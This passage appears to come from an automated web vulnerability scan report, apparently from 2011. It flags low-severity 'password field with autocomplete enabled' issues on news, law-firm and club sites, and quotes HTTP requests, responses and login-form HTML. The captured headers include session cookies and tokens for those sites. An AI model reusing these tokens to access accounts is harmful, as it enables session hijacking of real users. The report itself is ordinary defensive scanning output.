Cookie: NID=46=XFGT4lg_DpGj71fXNRI12T3QgI498DMCm4Vo9l4byW_QpzG-1W0BLR6-HJBfYe0g_Yd3khHZhnqBzpQ9o6NhmExBlmVDocZYG5FHVRmPESjfOu4RHg9_z7GWsQ3WRLNm; PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GAPS=1:Xcoa2dGJc6eFiskK3KG6ORiAIYwRQQ:0TF_9CKD902Y-2IJ;Path=/accounts;Expires=Sat, 11-May-2013 16:55:21 GMT;Secure;HttpOnly
Set-Cookie: GALX=DR2YInS6kgQ;Path=/accounts;Secure
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Thu, 12 May 2011 16:55:21 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10951
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
</style>
<form id="gaia_loginform"

action="https://www.google.com/accounts/ServiceLoginAuth" method="post"

onsubmit=
"return(gaia_onLoginSubmit());"
>
<div id="gaia_loginbox">
...[SNIP]...
<td>
<input type="password"
name="Passwd" id="Passwd"
size="18"




class="gaia le val"

/>
</td>
...[SNIP]...
19.6. http://www.hartfordbusiness.com/news14300.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hartfordbusiness.com
Path:   /news14300.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /news14300.html HTTP/1.1
Host: www.hartfordbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Set-Cookie: PHPSESSID=1b8355f904f52bc3571b2b0ee9c39004; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 6bc228ab1c195ad6c6bd4d06455b26ce=deleted; expires=Wed, 12-May-2010 16:55:20 GMT; path=/
Set-Cookie: 5ff776a7c2ecdadbd916c8b14c203a83=deleted; expires=Wed, 12-May-2010 16:55:20 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 34848

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:l
...[SNIP]...
<div id="template_left_bar">
           <form method="post" id="template_signin" class="fs_form" name="template_signin" action="article.php">
<fieldset style="border: none; display: none;">
...[SNIP]...
</label>
               <input type="password" name="User$0_password" class="t_signup_password"/>
               <input type="image" src="/template/hbj/images/template_signin_submit.png" class="submit" />
...[SNIP]...
19.7. http://www.hartfordbusiness.com/news14300.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hartfordbusiness.com
Path:   /news14300.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /news14300.html HTTP/1.1
Host: www.hartfordbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Set-Cookie: PHPSESSID=1b8355f904f52bc3571b2b0ee9c39004; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 6bc228ab1c195ad6c6bd4d06455b26ce=deleted; expires=Wed, 12-May-2010 16:55:20 GMT; path=/
Set-Cookie: 5ff776a7c2ecdadbd916c8b14c203a83=deleted; expires=Wed, 12-May-2010 16:55:20 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 34848

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:l
...[SNIP]...
</p>
<form method="post" action="http://www.hartfordbusiness.com/news14300.html#comments" class="fs_form fill" id="comment_form">
<fieldset style="border: none; display: none;">
...[SNIP]...
</label><input type="password" name="User$0_password" /></li>
...[SNIP]...
</label>            <input type="password" name="User$1_password" class="password medium" />
           <span class="error_detail">
...[SNIP]...
</label>            <input type="password" name="password_match" class="password medium" />
           <span class="error_detail">
...[SNIP]...
19.8. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /news/story/therese-polettis-tech-tales-ebay/story.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /news/story/therese-polettis-tech-tales-ebay/story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 13-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfpswebp04
Date: Thu, 12 May 2011 16:55:26 GMT
Content-Length: 47848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
</a><form method="post" action="https://secure.marketwatch.com/user/account/logon">
   <div>
...[SNIP]...
<br/>
           <input type="password" name="password" value="" class="text password"/>
       </p>
...[SNIP]...
19.9. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /news/story/therese-polettis-tech-tales-ebay/story.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /news/story/therese-polettis-tech-tales-ebay/story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 13-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfpswebp04
Date: Thu, 12 May 2011 16:55:26 GMT
Content-Length: 47848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
</p><form method="post" action="https://secure.marketwatch.com/user/account/logon">
   <div>
...[SNIP]...
<br/>
           <input type="password" name="password" value="" class="text password"/>
       </p>
...[SNIP]...
19.10. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /news/story/therese-polettis-tech-tales-ebay/story.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /news/story/therese-polettis-tech-tales-ebay/story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 13-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfpswebp04
Date: Thu, 12 May 2011 16:55:26 GMT
Content-Length: 47848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
</p><form method="post" action="https://secure.marketwatch.com/user/account/logon">
   <div>
...[SNIP]...
<br/>
           <input type="password" name="password" value="" class="text password"/>
       </p>
...[SNIP]...
19.11. http://www.orangecountyala.org/clubportal/memlogin.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.orangecountyala.org
Path:   /clubportal/memlogin.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /clubportal/memlogin.cfm?clubID=809 HTTP/1.1
Host: www.orangecountyala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.orangecountyala.org/clubportal/ocala/
Cookie: CFID=26523218; CFTOKEN=a4960fc383a335aa-E56858CC-0132-58C2-D7502B069979AD31; CFGLOBALS=urltoken%3DCFID%23%3D26523218%26CFTOKEN%23%3Da4960fc383a335aa%2DE56858CC%2D0132%2D58C2%2DD7502B069979AD31%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A51%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A51%27%7D%23hitcount%3D2%23cftoken%3Da4960fc383a335aa%2DE56858CC%2D0132%2D58C2%2DD7502B069979AD31%23cfid%3D26523218%23

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:12:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26523218%26CFTOKEN%23%3Da4960fc383a335aa%2DE56858CC%2D0132%2D58C2%2DD7502B069979AD31%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A12%3A06%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A51%27%7D%23hitcount%3D3%23cftoken%3Da4960fc383a335aa%2DE56858CC%2D0132%2D58C2%2DD7502B069979AD31%23cfid%3D26523218%23;expires=Sat, 04-May-2041 18:12:06 GMT;path=/
Content-Type: text/html; charset=UTF-8


<html xmlns="http://www.w3.org/1999/xhtml">


<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js">
...[SNIP]...
<table width="175" border="0" cellspacing="0" cellpadding="2" bgcolor="E8E8E8">
<form name="login" id="login" action="http://www.orangecountyala.org/clubportal/memLoginExe.cfm?clubID=809" method="post" enctype="multipart/form-data" onsubmit="return _CF_checklogin(this)">
   <input type="hidden" name="cftokenvalue" value="a4960fc383a335aa-E56858CC-0132-58C2-D7502B069979AD31" />
...[SNIP]...
<td width="100"><input name="password" id="password" type="password" size="12" /></td>
...[SNIP]...
19.12. http://www.pillsburylaw.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819540;path=/
Set-Cookie: CFTOKEN=67420103;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:09:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
</div>
                   <FORM action="/index.cfm?pageID=60" id="pcLogin" name="pcLogin" method="post" class="form">
                   <label>
...[SNIP]...
<input id="password-clear" type="text" value="Password" style="display:none;width:94%;"/>
                       <input type="password" name="pcpassword" id="pcpassword" value="" class="required" alias="Password" style="width:94%;">
                   </label>
...[SNIP]...
19.13. http://www.pillsburylaw.com/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /index.cfm?pageID=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A18; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:44:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
<div class="box" id="loginbox">

   <FORM action="/index.cfm?pageID=99" id="pcLogin" name="pcLogin" method="post" class="form">
   <h2>
...[SNIP]...
<input id="password-clear" type="text" value="Password" style="display:none;width:94%;"/>
       <input type="password" name="pcpassword" id="pcpassword" value="" class="required" alias="Password" style="width:94%;">
   </label>
...[SNIP]...
19.14. http://www.pillsburylaw.com/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:44:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
<div class="box" id="loginbox">

   <FORM action="/index.cfm?pageID=60" id="pcLogin" name="pcLogin" method="post" class="form">
   <h2>
...[SNIP]...
<input id="password-clear" type="text" value="Password" style="display:none;width:94%;"/>
       <input type="password" name="pcpassword" id="pcpassword" value="" class="required" alias="Password" style="width:94%;">
   </label>
...[SNIP]...
19.15. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:39 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000SJ1mmU6BOCbzCEKkGgUIi9q:140i3s34m; Path=/
Keep-Alive: timeout=10, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Thu, 12-May-2011 17:25:25 GMT;path=/
Content-Length: 60330


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>    
<head>
<script type="text/javascript">var _sf_startpt=(new
...[SNIP]...
</script>


<form id="loginForm" name="loginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9Fbl9MdzU2NDMwMDAyLzE3MzY5MDgvbGk!/" method="POST" >
   <input type="hidden" name="WPSRedirectURL" value="http://www.vault.com/wps/myportal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP"/>
...[SNIP]...
</label>
   <input id="join-password-input" name="password" type="password" value="" />
<div id="minCharMembership">
...[SNIP]...
</label>
   <input id="join-passconf-input" name="UserConfirm" type="password" value="" />
   <label for="join-zip-input" id="join-zipcode">
...[SNIP]...
19.16. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:39 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000SJ1mmU6BOCbzCEKkGgUIi9q:140i3s34m; Path=/
Keep-Alive: timeout=10, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Thu, 12-May-2011 17:25:25 GMT;path=/
Content-Length: 60330


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>    
<head>
<script type="text/javascript">var _sf_startpt=(new
...[SNIP]...
</div>

<form id="mainLoginForm" name="mainLoginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9Ybl9MdzU2NDMwMDAxLzE3MzY5MDcvbGk!/" method="POST">
                   <div class="lightbox_text2">
...[SNIP]...
</label>
<input type="password" name="password" id="password" value="" />
                       <br />
...[SNIP]...
19.17. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:30 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000EomNXSy4TXZVIAszHpfxWyJ:140i3s34m; Path=/
Keep-Alive: timeout=10, max=56
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Thu, 12-May-2011 17:25:15 GMT;path=/
Content-Length: 59570


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>    
<head>
<script type="text/javascript">var _sf_startpt=(new
...[SNIP]...
</script>


<form id="loginForm" name="loginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS94N0dxbDQwMDkwMDAyLzE3MzY4NDYvbGk!/" method="POST" >
   <input type="hidden" name="WPSRedirectURL" value="http://www.vault.com/wps/myportal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver"/>
...[SNIP]...
</label>
   <input id="join-password-input" name="password" type="password" value="" />
<div id="minCharMembership">
...[SNIP]...
</label>
   <input id="join-passconf-input" name="UserConfirm" type="password" value="" />
   <label for="join-zip-input" id="join-zipcode">
...[SNIP]...
19.18. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:30 GMT
Server: IBM_HTTP_Server
